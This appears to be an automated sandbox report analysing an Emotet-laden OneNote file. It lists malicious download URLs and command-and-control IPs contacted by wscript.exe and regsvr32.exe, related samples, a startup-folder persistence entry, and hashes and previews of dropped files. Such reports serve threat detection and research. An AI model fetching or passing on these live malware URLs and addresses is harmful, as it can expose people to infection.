https://163.44.196.120:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/	regsvr32.exe, 0000000D.00000002.572469448.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.573121126.000000000315C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ozmeydan.com/cekici	wscript.exe, 0000000A.00000002.354280215.0000000005862000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349730028.000000000585B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/	wscript.exe, wscript.exe, 0000000A.00000003.344517254.000000000571B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329234815.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330874377.0000000003109000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338612910.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.353199405.00000000058CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349921274.00000000058C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354171415.00000000054D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338364395.000000000557B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333126963.0000000005483000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338711188.0000000005646000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340959551.0000000005747000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329158898.000000000310E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333630424.00000000054AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337986785.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354280215.0000000005862000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334232531.0000000005535000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340425681.000000000561C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.350893818.000000000591E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349970561.0000000005899000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.331782249.00000000053E2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM	wscript.exe, 0000000A.00000003.350604005.0000000005120000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://160.16.142.56:8080/	regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://penshorn.org/admin/Ses8712iGR8du/o	wscript.exe, 0000000A.00000002.353943277.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329874156.00000000030BF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.353230721.00000000030C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.328965636.00000000030AA000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://159.65.88.10:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/Xa4	regsvr32.exe, 0000000D.00000002.572469448.000000000115C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/temobj	wscript.exe, 0000000A.00000003.353391125.0000000003093000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.353921759.0000000003094000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
110.232.117.186	unknown	Australia	56038	RACKCORP-APRackCorpAU	true
103.132.242.26	unknown	India	45117	INPL-IN-APIshansNetworkIN	true
104.168.155.143	unknown	United States	54290	HOSTWINDSUS	true
79.137.35.198	unknown	France	16276	OVHFR	true
115.68.227.76	unknown	Korea Republic of	38700	SMILESERV-AS-KRSMILESERVKR	true
163.44.196.120	unknown	Singapore	135161	GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG	true
206.189.28.199	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
203.26.41.131	penshorn.org	Australia	38719	DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU	true
107.170.39.149	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
66.228.32.31	unknown	United States	63949	LINODE-APLinodeLLCUS	true
197.242.150.244	unknown	South Africa	37611	AfrihostZA	true
185.4.135.165	unknown	Greece	199246	TOPHOSTGR	true
183.111.227.137	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
45.176.232.124	unknown	Colombia	267869	CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC	true
169.57.156.166	unknown	United States	36351	SOFTLAYERUS	true
164.68.99.3	unknown	Germany	51167	CONTABODE	true
139.59.126.41	unknown	Singapore	14061	DIGITALOCEAN-ASNUS	true
167.172.253.162	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
167.172.199.165	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
202.129.205.3	unknown	Thailand	45328	NIPA-AS-THNIPATECHNOLOGYCOLTDTH	true
147.139.166.154	unknown	United States	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
153.92.5.27	unknown	Germany	47583	AS-HOSTINGERLT	true
159.65.88.10	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
172.105.226.75	unknown	United States	63949	LINODE-APLinodeLLCUS	true
164.90.222.65	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
213.239.212.5	unknown	Germany	24940	HETZNER-ASDE	true
5.135.159.50	unknown	France	16276	OVHFR	true
186.194.240.217	unknown	Brazil	262733	NetceteraTelecomunicacoesLtdaBR	true
119.59.103.152	unknown	Thailand	56067	METRABYTE-TH453LadplacoutJorakhaebuaTH	true
159.89.202.34	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
91.121.146.47	unknown	France	16276	OVHFR	true
160.16.142.56	unknown	Japan	9370	SAKURA-BSAKURAInternetIncJP	true
201.94.166.162	unknown	Brazil	28573	CLAROSABR	true
91.207.28.33	unknown	Kyrgyzstan	39819	PROHOSTKG	true
103.75.201.2	unknown	Thailand	133496	CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH	true
103.43.75.120	unknown	Japan	20473	AS-CHOOPAUS	true
188.44.20.25	unknown	Macedonia	57374	GIV-ASMK	true
45.235.8.30	unknown	Brazil	267405	WIKINETTELECOMUNICACOESBR	true
153.126.146.25	unknown	Japan	7684	SAKURA-ASAKURAInternetIncJP	true
72.15.201.15	unknown	United States	13649	ASN-VINSUS	true
187.63.160.88	unknown	Brazil	28169	BITCOMPROVEDORDESERVICOSDEINTERNETLTDABR	true
82.223.21.224	unknown	Spain	8560	ONEANDONE-ASBrauerstrasse48DE	true
173.212.193.249	unknown	Germany	51167	CONTABODE	true
95.217.221.146	unknown	Germany	24940	HETZNER-ASDE	true
149.56.131.28	unknown	Canada	16276	OVHFR	true
182.162.143.56	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
1.234.2.232	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
129.232.188.93	unknown	South Africa	37153	xneeloZA	true
94.23.45.86	unknown	France	16276	OVHFR	true

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	828494
Start date and time:	2023-03-17 09:10:21 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	Insight_Medical_Publishing_4.one
Detection:	MAL
Classification:	mal100.troj.expl.evad.winONE@12/695@1/49
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 50.2% (good quality ratio 42.4%) Quality average: 60.5% Quality standard deviation: 35.6%
HCA Information:	Successful, ratio: 89% Number of executed functions: 20 Number of non-executed functions: 135
Cookbook Comments:	Found application associated with file extension: .one

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.109.88.191, 20.231.71.84, 20.25.84.51, 8.248.139.254, 8.253.207.121, 8.248.113.254, 8.238.85.126, 8.238.190.126
Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, nexus.officeapps.live.com, ctldl.windowsupdate.com, officeclient.microsoft.com, wu-bg-shim.trafficmanager.net, europe.configsvc1.live.com.akadns.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:12:01	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk
09:12:08	API Interceptor	2x Sleep call for process: wscript.exe modified
09:12:35	API Interceptor	11x Sleep call for process: regsvr32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
110.232.117.186	OMICS_Online_1.one	Get hash	malicious	Emotet	Browse
	Insight_Medical_Publishing.one	Get hash	malicious	Emotet	Browse
	Omics_Journal.one	Get hash	malicious	Emotet	Browse
	OMICS.one	Get hash	malicious	Emotet	Browse
	OPAST_GROUP_1.one	Get hash	malicious	Emotet	Browse
	OPAST_GROUP_LLC.one	Get hash	malicious	Emotet	Browse
	OPAST_GROUP.one	Get hash	malicious	Emotet	Browse
	Opast_International.one	Get hash	malicious	Emotet	Browse
	opastonline.com.one	Get hash	malicious	Emotet	Browse
	Opast_Publishing_Group_1.one	Get hash	malicious	Emotet	Browse
	Opast_Publishing_Group.one	Get hash	malicious	Emotet	Browse
	omicsonline.net.one	Get hash	malicious	Emotet	Browse
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse
	2023-03-16_0923.one	Get hash	malicious	Emotet	Browse
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse
	100935929722734787.one	Get hash	malicious	Emotet	Browse
	NG7553084292252526_202303161746.one	Get hash	malicious	Emotet	Browse
	2023-03-16_1753.one	Get hash	malicious	Emotet	Browse
	PUV026949243199756981_202303161748.one	Get hash	malicious	Emotet	Browse
	355444649229343017.one	Get hash	malicious	Emotet	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
penshorn.org	OMICS_Online_1.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Insight_Medical_Publishing.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Omics_Journal.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OMICS.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OPAST_GROUP_1.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OPAST_GROUP_LLC.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OPAST_GROUP.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Opast_International.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	opastonline.com.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Opast_Publishing_Group_1.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Opast_Publishing_Group.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	omicsonline.net.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	2023-03-16_0923.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	100935929722734787.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	NG7553084292252526_202303161746.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	2023-03-16_1753.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	PUV026949243199756981_202303161748.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	355444649229343017.one	Get hash	malicious	Emotet	Browse	203.26.41.131

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RACKCORP-APRackCorpAU	OMICS_Online_1.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	Insight_Medical_Publishing.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	Omics_Journal.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	OMICS.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	OPAST_GROUP_1.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	OPAST_GROUP_LLC.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	OPAST_GROUP.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	Opast_International.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	opastonline.com.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	Opast_Publishing_Group_1.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	Opast_Publishing_Group.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	omicsonline.net.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	2023-03-16_0923.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	100935929722734787.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	NG7553084292252526_202303161746.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	2023-03-16_1753.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	PUV026949243199756981_202303161748.one	Get hash	malicious	Emotet	Browse	110.232.117.186
	355444649229343017.one	Get hash	malicious	Emotet	Browse	110.232.117.186

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ce5f3254611a8c095a3d821d44539877	OMICS_Online_1.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Insight_Medical_Publishing.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Omics_Journal.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OMICS.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OPAST_GROUP_1.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OPAST_GROUP_LLC.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	OPAST_GROUP.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Opast_International.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	opastonline.com.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Opast_Publishing_Group_1.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	Opast_Publishing_Group.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	omicsonline.net.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	aRThcK3rSO.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, RedLine, SmokeLoader	Browse	203.26.41.131
	click.wsf	Get hash	malicious	Emotet	Browse	203.26.41.131
	setup.exe	Get hash	malicious	Amadey, Djvu, RedLine, SmokeLoader	Browse	203.26.41.131
	purchase_order.exe	Get hash	malicious	BluStealer, ThunderFox Stealer, a310Logger	Browse	203.26.41.131
	file.exe	Get hash	malicious	Amadey, Djvu, SmokeLoader	Browse	203.26.41.131
	setup.exe	Get hash	malicious	SmokeLoader	Browse	203.26.41.131
	it2NFpv2yt.exe	Get hash	malicious	SmokeLoader	Browse	203.26.41.131
	file.exe	Get hash	malicious	SmokeLoader	Browse	203.26.41.131

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\rad16F69.tmp.dll	OMICS_Online_1.one	Get hash	malicious	Emotet	Browse
	Insight_Medical_Publishing.one	Get hash	malicious	Emotet	Browse
	Omics_Journal.one	Get hash	malicious	Emotet	Browse
	OMICS.one	Get hash	malicious	Emotet	Browse
	OPAST_GROUP_1.one	Get hash	malicious	Emotet	Browse
	OPAST_GROUP_LLC.one	Get hash	malicious	Emotet	Browse
	OPAST_GROUP.one	Get hash	malicious	Emotet	Browse
	Opast_International.one	Get hash	malicious	Emotet	Browse
	opastonline.com.one	Get hash	malicious	Emotet	Browse
	Opast_Publishing_Group_1.one	Get hash	malicious	Emotet	Browse
	Opast_Publishing_Group.one	Get hash	malicious	Emotet	Browse
	omicsonline.net.one	Get hash	malicious	Emotet	Browse
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse
	2023-03-16_0923.one	Get hash	malicious	Emotet	Browse
	report_03_16_2023.one	Get hash	malicious	Emotet	Browse
	100935929722734787.one	Get hash	malicious	Emotet	Browse
	NG7553084292252526_202303161746.one	Get hash	malicious	Emotet	Browse
	2023-03-16_1753.one	Get hash	malicious	Emotet	Browse
	PUV026949243199756981_202303161748.one	Get hash	malicious	Emotet	Browse
	355444649229343017.one	Get hash	malicious	Emotet	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 62582 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	62582
Entropy (8bit):	7.996063107774368
Encrypted:	true
SSDEEP:	1536:Jk3XPi43VgGp0gB2itudTSRAn/TWTdWftu:CHa43V5p022iZ4CgA
MD5:	E71C8443AE0BC2E282C73FAEAD0A6DD3
SHA1:	0C110C1B01E68EDFACAEAE64781A37B1995FA94B
SHA-256:	95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72
SHA-512:	B38458C7FA2825AFB72794F374827403D5946B1132E136A0CE075DFD351277CF7D957C88DC8A1E4ADC3BCAE1FA8010DAE3831E268E910D517691DE24326391A6
Malicious:	false
Preview:	MSCF....v.......,...................I.................BVrl .authroot.stl....oJ5..CK..8U....a..3.1.P. J.".t..2F2e.dHH......$E.KB.2D..-SJE....^..'..y.}..,{m.....\...]4.G.......h....148...e.gr.....48:.L...g.....Xef.x:..t...J...6-....kW6Z>....&......ye.U.Q&z:.vZ..._....a...]..T.E.....B.h.,...[....V.O.3..EW.x.?.Q..$.@.W..=.B.f..8a.Y.JK..g./%p..C.4CD.s..Jd.u..@.g=...a.. .h%..'.xjy7.E..\.....A..':.4TdW?Ko3$.Hg.z.d~....../q..C.....`...A[ W(.........9...GZ.;....l&?........F...p?... .p.....{S.L4..v.+...7.T?.....p..`..&..9.......f...0+.L.....1.2b)..vX5L'.~....2vz.,E.Ni.{#...o..w.?.#.3..h.v<.S%.].tD@!Le.w.q.7.8....QW.FT.....hE.........Y............./.%Q...k....Y.n..v.A..../...>B..5\..-Ko.......O<.b.K.{.O.b...._.7...4.;%9N..K.X>......kg-9..r.c.g.G\|.[.-...HT...",?.q...ad....7RE.......!f..#../....?.-.^.K.c^...+{.g......]<..$.=.O....ii7.wJ+S..Z..d.....>..J*...T..Q7..`.r,<$....\d:K`..T.n....N.....C..j.;.1SX..j....1...R....+....Yg....]....3..9..S..D..`.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.1335351732898324
Encrypted:	false
SSDEEP:	6:kKVgry/7UN+SkQlPlEGYRMY9z+4KlDA3RUecZUt:WCvkPlE99SNxAhUext
MD5:	F99DEA8FDA2910B1558D383830CF272B
SHA1:	E8902BDC8CB49327645BB283D1A2C060D8D63AA0
SHA-256:	2D94DC8D56140D97F480541DE7DE0B71110E43BA9B403E6F7935EC097150616B
SHA-512:	9CB525B3AB7394B8CC2615752CC56C812D91C403C679092E1CFBB03C17637BFEED5D3989415FABEFA9DD1B19E2B6788ADB94C85EF14B754B1EEB02F98608978F
Malicious:	false
Preview:	p...... .........'.H.X..(....................................................... ..........).K......&...........v...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.2.f.9.2.9.a.7.4.b.d.9.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\1A820D3C-0F4E-4D92-BB7D-90BF78AE86CD

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	154907
Entropy (8bit):	5.3520187063583995
Encrypted:	false
SSDEEP:	1536:V+C76gfYBIB9guw6LQ9DQl+zQxik4F77nXmvidlXRpE6Lhz67:ccQ9DQl+zrXgb
MD5:	1DB833D2AB3E61B3E206884BDCC4961B
SHA1:	DC7601BA212B9228CE8315D05250763237118F63
SHA-256:	EFFDAE6EFE38C375A4250E3582DCCAFAAF3E25A6A6143F656DE1E70922BD3A8F
SHA-512:	9B582B9DA040AC520A98509AB99F91775FFF65A30AB0A63A8C11906FC4CF773A14C5EEF115729D133F2863DBA9CE03FB06E095BA0F8013BF66F4DF10D5376673
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2023-03-17T08:11:24">.. Build: 16.0.16310.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
